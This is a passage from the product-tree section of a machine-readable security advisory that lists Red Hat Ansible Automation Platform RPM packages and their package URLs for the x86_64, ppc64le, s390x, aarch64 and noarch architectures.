"name": "automation-controller-0:4.7.10-2.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.7.10-2.el9ap.x86_64",
"product_id": "automation-controller-0:4.7.10-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.10-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.10-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-2.el10ap.x86_64",
"product": {
"name": "receptor-0:1.6.4-2.el10ap.x86_64",
"product_id": "receptor-0:1.6.4-2.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-2.el10ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-2.el10ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-2.el10ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.6.3-3.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.1.1-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.1.1-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.1.1-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-1.el9ap.ppc64le",
"product": {
"name": "receptor-0:1.6.4-1.el9ap.ppc64le",
"product_id": "receptor-0:1.6.4-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"product": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"product_id": "automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.14-1.el9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"product_id": "automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.14-1.el9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.14-1.el9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.14-1.el9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.10-2.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.7.10-2.el9ap.ppc64le",
"product_id": "automation-controller-0:4.7.10-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.10-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.10-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-2.el10ap.ppc64le",
"product": {
"name": "receptor-0:1.6.4-2.el10ap.ppc64le",
"product_id": "receptor-0:1.6.4-2.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-2.el10ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-2.el10ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-2.el10ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.6.3-3.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"product_id": "python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.1.1-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"product_id": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.1.1-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"product_id": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.1.1-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-1.el9ap.s390x",
"product": {
"name": "receptor-0:1.6.4-1.el9ap.s390x",
"product_id": "receptor-0:1.6.4-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"product_id": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"product": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"product_id": "automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.14-1.el9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"product_id": "automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.14-1.el9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.14-1.el9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.14-1.el9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.10-2.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.7.10-2.el9ap.s390x",
"product_id": "automation-controller-0:4.7.10-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.10-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.10-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-2.el10ap.s390x",
"product": {
"name": "receptor-0:1.6.4-2.el10ap.s390x",
"product_id": "receptor-0:1.6.4-2.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-2.el10ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"product_id": "receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-2.el10ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-2.el10ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.6.3-3.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"product_id": "python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.1.1-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.1.1-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.1.1-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-1.el9ap.aarch64",
"product": {
"name": "receptor-0:1.6.4-1.el9ap.aarch64",
"product_id": "receptor-0:1.6.4-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"product": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"product_id": "automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.14-1.el9?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"product_id": "automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.14-1.el9?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.14-1.el9?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.14-1.el9?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.10-2.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.7.10-2.el9ap.aarch64",
"product_id": "automation-controller-0:4.7.10-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.10-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.10-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-2.el10ap.aarch64",
"product": {
"name": "receptor-0:1.6.4-2.el10ap.aarch64",
"product_id": "receptor-0:1.6.4-2.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-2.el10ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-2.el10ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-2.el10ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bactivitystream@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bapi_documentation@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bauthentication@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bchannel_auth@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bfeature_flags@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bjwt_consumer@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Boauth2_provider@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Brbac@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bredis_client@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bresource_registry@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Brest_filters@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base@2.6.20260325-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"product": {
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"product_id": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulp-ansible@0.25.4-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"product": {
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"product_id": "python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.54-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-filter-0:25.2-1.el9ap.noarch",
"product": {
"name": "python3.12-django-filter-0:25.2-1.el9ap.noarch",
"product_id": "python3.12-django-filter-0:25.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-filter@25.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"product": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"product_id": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-asgiref@3.11.1-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"product": {
"name": "python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"product_id": "python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-channels%2Bdaphne@4.3.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-channels-0:4.3.2-1.el9ap.noarch",
"product": {
"name": "python3.12-channels-0:4.3.2-1.el9ap.noarch",
"product_id": "python3.12-channels-0:4.3.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-channels@4.3.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"product": {
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"product_id": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-drf-spectacular@0.29.0-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-0:5.2.12-1.el9ap.noarch",
"product": {
"name": "python3.12-django-0:5.2.12-1.el9ap.noarch",
"product_id": "python3.12-django-0:5.2.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django@5.2.12-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.16.17-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.16.17-1.el9ap.noarch",
"product_id": "ansible-core-1:2.16.17-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.16.17-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.16.17-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.16.17-1.el9ap.noarch",
"product_id": "ansible-test-1:2.16.17-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.16.17-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.4-1.el9ap.noarch",
"product": {
"name": "receptorctl-0:1.6.4-1.el9ap.noarch",
"product_id": "receptorctl-0:1.6.4-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.4-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"product": {
"name": "automation-platform-ui-0:2.6.7-1.el9ap.noarch",
